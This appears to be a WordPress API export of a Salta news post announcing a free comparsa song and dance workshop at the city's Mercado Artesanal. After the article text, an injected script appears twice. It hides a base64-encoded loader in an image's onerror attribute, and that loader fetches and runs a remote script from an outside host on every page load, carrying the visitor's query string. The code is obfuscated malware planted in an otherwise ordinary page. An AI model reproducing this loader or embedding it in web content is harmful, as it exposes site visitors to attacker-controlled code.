{"id":3732,"date":"2024-02-21T12:13:39","date_gmt":"2024-02-21T15:13:39","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3732"},"modified":"2025-08-14T00:00:14","modified_gmt":"2025-08-14T03:00:14","slug":"corredor-cultural-de-los-barrios-taller-de-canto-y-danza-de-comparsa-saltena-en-el-mercado-artesanal","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3732","title":{"rendered":"Corredor Cultural de los Barrios: Taller de Canto y Danza de Comparsa Salte\u00f1a en el Mercado Artesanal"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-9bf1e632b5c8766eab55a566eb7778ed\" style=\"background-color:#91164b\"><em>El viernes 23 de febrero a las 17 horas, la comparsa los Inkas del Tawantinsuyo en sus 25 a\u00f1os compartir\u00e1n con el p\u00fablico en general su arte y destreza. Actividad con entrada libre y gratuita.<\/em><\/h4>\n\n\n\n<p>La&nbsp;<strong>Secretar\u00eda de Cultura&nbsp;<\/strong>de la Provincia y la Agencia Cultura Activa de la Municipalidad de Salta llevan adelante el Corredor Cultural de los Barrios con propuestas gratuitas de diversas \u00edndoles que acercan a la comunidad a los polos culturales de la Ciudad, promoviendo la cultura y el sentido de pertenencia a estos espacios.<\/p>\n\n\n\n<p>En esta oportunidad, la comparsa los Inkas del Tawantisuyo brindar\u00e1n un Taller de Canto y Danza de Comparsa Salte\u00f1a, donde desplegar\u00e1n el arte y cultura Diaguita Calchaqu\u00ed y Precolombina con comparsas invitadas. El mismo estar\u00e1 a cargo de Vera H\u00e9ctor Ram\u00f3n, Daniel Plaza, Ariel Brizuela, Priscila Barcelo y Sergio Villaruel.<\/p>\n\n\n\n<p>La actividad tendr\u00e1 lugar el viernes 23 de febrero a las 17 horas en el Mercado Artesanal de Salta, Av. San Mart\u00edn 2555, con entrada libre y gratuita.<\/p>\n\n\n\n<p>El Corredor Cultural de los Barrios lo integran Mercado Artesanal de Salta, Centro Cultural Dino Saluzzi y Casona de Casta\u00f1ares.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/corredor-cultural-de-los-barrios-taller-de-canto-y-danza-de-comparsa-saltenia-en-el-mercado-artesanal-94264\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El viernes 23 de febrero a las 17 horas, la comparsa los Inkas del Tawantinsuyo en sus 25 a\u00f1os compartir\u00e1n con el p\u00fablico en general su arte y destreza. Actividad con entrada libre y gratuita. La&nbsp;Secretar\u00eda de Cultura&nbsp;de la Provincia y la Agencia Cultura Activa de la Municipalidad de Salta llevan adelante el Corredor Cultural [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3733,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-3732","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3732"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3732"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3732\/revisions"}],"predecessor-version":[{"id":6847,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3732\/revisions\/6847"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3733"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3732"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3732"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3732"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}